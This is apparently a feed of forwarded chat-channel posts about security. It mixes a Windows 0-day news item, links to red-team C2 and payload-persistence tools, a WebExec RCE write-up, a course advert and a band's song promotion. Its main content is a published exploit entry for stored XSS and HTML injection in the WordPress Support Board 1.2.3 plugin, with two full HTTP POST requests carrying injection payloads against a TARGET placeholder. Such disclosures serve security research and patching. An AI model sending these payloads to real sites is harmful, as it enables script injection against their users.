Forwarded from Allan
MuySeguridad
Another Windows 0-day vulnerability disclosed on Twitter
A researcher who in August published a Windows privilege escalation bug on Twitter has published another Windows 0-day vulnerability for which no fix exists.
WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting
---------------------
# Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://schiocco.com/
# Software Link : https://board.support/
# Software : Support Board - Chat And Help Desk
# Version : v1.2.3
# Vulnerability Type : Code Injection
# Vulnerability : HTML Injection and Stored XSS
# CVE : N/A
# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress,
# a Stored XSS vulnerability has been discovered in file upload areas in the
# Chat and Help Desk sections via the msg parameter
# in a /wp-admin/admin-ajax.php sb_ajax_add_message action.
# HTTP POST Request : [Stored XSS]
----------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/chat/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 450
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
# In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin,
# the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and
# file upload areas in the Chat and Help Desk sections of Schiocco.
# HTTP POST Request : [HTML Injection]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/desk-demo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
Red Teaming .. https://github.com/SpiderLabs/DoHC2
DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). - SpiderLabs/DoHC2
Forwarded from Ivan Chavero
First of all, sorry for the spam, but this YouTube thing is damn hard. I hope you like the new song from my band Seis Pistos
https://www.youtube.com/watch?v=l5iD9eqr6IM
Seis Pistos SuperCero ft. Lng/Sht
Super Cero by Seis Pistos ft. LNG/Sht, produced by Tito Fuentes
Follow us on:
Spotify: https://open.spotify.com/track/6rtVQQ9BlEszAaMHBmhrHg
Twitter: https://twitter.com/seispistos
Instagram: https://www.instagram.com/seis_pistos/
Lyrics:
I used to fight more…
The PoC dropper/malware example from @dafthack and my Covert Attack Mystery Box. Weaponized Windows Kernel WNF for side-channel data persistence
https://github.com/ustayready/CasperStager
PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls. - ustayready/CasperStager
Technical Rundown of WebExec (CVE-2018-15442) - Cisco Webex Meetings Desktop App for Windows RCE with SYSTEM privileges https://blog.skullsecurity.org/2018/technical-rundown-of-webexec
Few seats left for the Web Penetration Tester course in #CDMX!!
November 8 and 9!!
More information at:
https://tpx.mx/cursos/web-penetration-tester/cdmx
PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls.
https://github.com/ustayready/CasperStager